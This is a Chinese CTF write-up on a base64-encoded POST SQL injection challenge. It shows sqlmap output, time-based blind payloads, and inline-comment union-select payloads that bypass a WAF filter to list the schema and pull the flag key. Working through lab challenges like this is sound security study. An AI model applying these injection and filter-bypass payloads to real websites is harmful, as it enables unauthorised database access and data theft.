翻到群里的小伙伴發出一道POST型SQL注入題,簡單抓包判斷出題目需要base64編碼后才執行sql語句,為學習下SQL注入出題與闖關的思路+工作不是很忙,所以花點時間玩了一下,哈哈哈哈哈哈哈哈哈
http://104.224.169.128/tasks/web12.php
1 <scriptlanguage="javascript">function onSearch() 2 { 3 var pwd=document.forms[0].inText.value; 4 $.base64.utf8encode =true; 5 document.forms[0].inputText.value=$.base64.encode(pwd); 6 document.forms[0].submit(); 7 </script>
**思路過程:**
首先抓包到sqlmap里面測試,這里用firefox的hackbar就可以了。明顯看出表單有個隱藏字段提交的內容被base64編碼過了,這類題目大多是出於為了讓參賽者必須手工測試才這么做的。起初覺得這應該為難不了sqlmap,只要抓包加上–tamper base64encode擴展模塊就可以了,后來發現居然只能讀取到庫名,加-V 5得到詳細的playload,還是用sleep時間盲注判斷的;what the hell?;
0x01 SQLMAP:
首次測試:列庫名
inText=1111&inputText=JyBBTkQgNTY3MD1JRigoT1JEKE1JRCgoSUZOVUxMKENBU1QoREFUQUJBU0 UoKSBBUyBDSEFSKSwweDIwKSksMTIsMSkpPjEpLFNMRUVQKDUpLDU2NzApIEFORCAnRkt6SScgTElLRS AnRkt6SQ%3D%3D
[18:39:54][TRAFFIC IN] HTTP response [#4613](200 OK): Content-length:1215 Content-language: zh-CN Uri: http://104.224.169.128:80/tasks/web12.php Server:Apache/2.2.15(CentOS) DAV/2 Connection: close Date:Tue,19Apr201610:39:53 GMT Content-type: text/html [18:39:55][INFO] retrieved: injecttest2 [18:39:55][DEBUG] performed 95 queries in694.98 seconds current database:'injecttest2' [18:39:55][INFO] fetched data logged to text files under 'C:\Users\Administrato r\.sqlmap\output\104.224.169.128'
二次測試:無法找到表名
加-V后獲取的完整回顯包
sqlmap resumed the following injection point(s)from stored session: --- Parameter:#1* ((custom) POST) Type: AND/OR time-based blind Title:MySQL>=5.0.12 AND time-based blind Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) --- web server operating system:LinuxCentOS6.5 web application technology:Apache2.2.15 back-end DBMS:MySQL5.0.12 available databases [1]: [*] injecttest2 sqlmap resumed the following injection point(s)from stored session: --- Parameter:#1* ((custom) POST) Type: AND/OR time-based blind Title:MySQL>=5.0.12 AND time-based blind Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) --- web server operating system:LinuxCentOS6.5 web application technology:Apache2.2.15 back-end DBMS:MySQL5.0.12 No tables found sqlmap resumed the following injection point(s)from stored session: --- Parameter:#1* ((custom) POST) Type: AND/OR time-based blind Title:MySQL>=5.0.12 AND time-based blind Payload: inText=11111111&inputText=' AND SLEEP(5) AND 'uYGj' LIKE 'uYGj --- web server operating system:LinuxCentOS6.5 web application technology:Apache2.2.15 back-end DBMS:MySQL5.0.12 No tables found
提取出SQLMAP的Playload
1 ' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),12,1))>1),SLEEP(5),5670) AND 'FKzI' LIKE 'FKzI
0x02 手工測試
了不起手工閉合sql語句的單引號再注入嘛。哼哼哼;
(1)本地測試
摸索了下SQLMAP的playload,查了if()、ord()、mid()、IFNULL()、CAST()等函數用法;
簡化sqlmap用sleep()函數,改成判斷對錯的形式,對比AND 5670=5670的頁面返回頁面內容長度判斷是否存在注入,盲注猜測出數據庫名,本地測試測試效果內容如下;
1 mysql>select * from the_flag_table where the_flag_content like '%' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116),5671,5670); 2 +----------------------+-----------------+ 3 | the_flag_content | the_value123456 | 4 +----------------------+-----------------+ 5 | flags{Hello,Iamflags|1| 6 | flags2(hello,test)|2| 7 +----------------------+-----------------+ 8 2 rows inset(0.00 sec) 9 mysql>select * from the_flag_table where the_flag_content like '%' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116),5670,5671); 10 Emptyset(0.00 sec)
檢測數據庫名稱長度;
1 select * from the_flag_table where the_flag_content like '%'union select (LENGTH((IFNULL(CAST(DATABASE() AS CHAR),0x20)))>11),222--
使用MID()函數查詢出每一位的ASCII碼是否正確;
' AND 5670=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),N,1))>105),5670,5671)-- **得出結果:** 庫:injecttest2 用戶:injectuser2@localhost
(2) 然並卵:
在我測試IF函數注入測得如火如荼的時候,突然群里少年提醒IF函數注入這種情況只能查詢出DATABASE() 、USER() 和 VERSION(),即使可以查也無法跨表查詢也無法跨表也無法也無….;
此時此刻我的內心是崩潰的。。。
0x03 繞過關鍵字測試:
只好走回老路,收集mysql注入繞過的相關文章,判斷是什么被檢測,判斷思路;
(1)sql語句某個關鍵字被過濾如union、select等;
(2)特殊符號被過濾如空格、單引號、等號等;
(3)過濾某段字符串;
測試關鍵字、符號等情況都未觸發檢測策略,而當輸入“’ union select 1– ”時就會觸發到檢測策略;
隨機找相關文章逐一測試,按照下面兩篇文章中提到的繞過IDS/WAF方法測試,測出內聯注釋的方式可以繞過。而注入點已是base64編碼所以文章中的編碼可以放棄使用:
《深入了解SQL注入繞過waf和過濾機制》
http://drops.wooyun.org/tips/968
Avoiding Keywords
http://websec.ca/kb/sql_injection
內聯注釋playload
以下是我運用內聯注釋的過程Playload;
字段說明
相關的庫名 :injecttest2
庫名編碼后:696e6a6563747465737432
相關的表名:article,__key___in__this
”__key___in__this“表名編碼后:0x5f5f6b65795f5f5f696e5f5f74686973
相關字段:keystr
內容獲取:Key:d8b3bc4ecd8791fb
‘ order by3-- **庫名** ' /*!union*/ /*!select*/ version(),2,3-- '/*!union*/ /*!select*/ (/*!select*/ schema_name from information_schema.schemata limit 1,1),2,3-- **表名** ' /*!union*/ /*!select*/ (/*!select*/ table_name from information_schema.tables where table_schema=0x696e6a6563747465737432 /*!*/limit 1,1),2,3-- **字段名** '/*!union*/ /*!select*/ (/*!select*/ column_name from information_schema.columns where table_name=0x5f5f6b65795f5f5f696e5f5f74686973 limit 0,1),2,3-- **flag獲取** ' /*!union*/ /*!select*/ (/*!select*/ keystr from __key___in__this limit 0,1),2,3--
懵逼中
在測試的時候有人也用另外一種注釋方法繞過了,也把過程補充上來吧。下面是三張實例圖;
' order by3-- ' union select/*!*/1,2,3-- **庫名** ' union select/*!*/(select/*!*/schema_name from information_schema.schemata limit 0,1),2,3-- ' union select/*!*/(select/*!*/schema_name/*!*/from information_schema.schemata/*!*/limit 1,1),2,3-- **表名** 'union select/*!*/(select/*!*/table_name/*!*/from information_schema.tables where table_schema=0x696e6a6563747465737432/*!*/limit 1,1),2,3-- **字段名** ' union select/*!*/(select/*!*/column_name/*!*/from information_schema.columns where table_name=0x5f5f6b65795f5f5f696e5f5f74686973 /*!*/limit 0,1),2,3-- **flag獲取** 'union select/*!*/(select/*!*/keystr/*!*/from __key___in__this/*!*/limit 0,1),2,3--
Playload
inText=1&inputText=%JyB1bmlvbiBzZWxlY3QvKiEqLyhzZWxlY3QvKiEqL3NjaGVtYV9uYW1lLyohKi9mcm9tLyohKi9pbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEvKiEqL2xpbWl0LyohKi8xLDEpLDIsMy0tIC0=
相關實例:
[威鋒官方APP存在SQL注入(SQLMAP之全POST Base64編碼實例)]
http://www.wooyun.org/bugs/wooyun-2010-0177954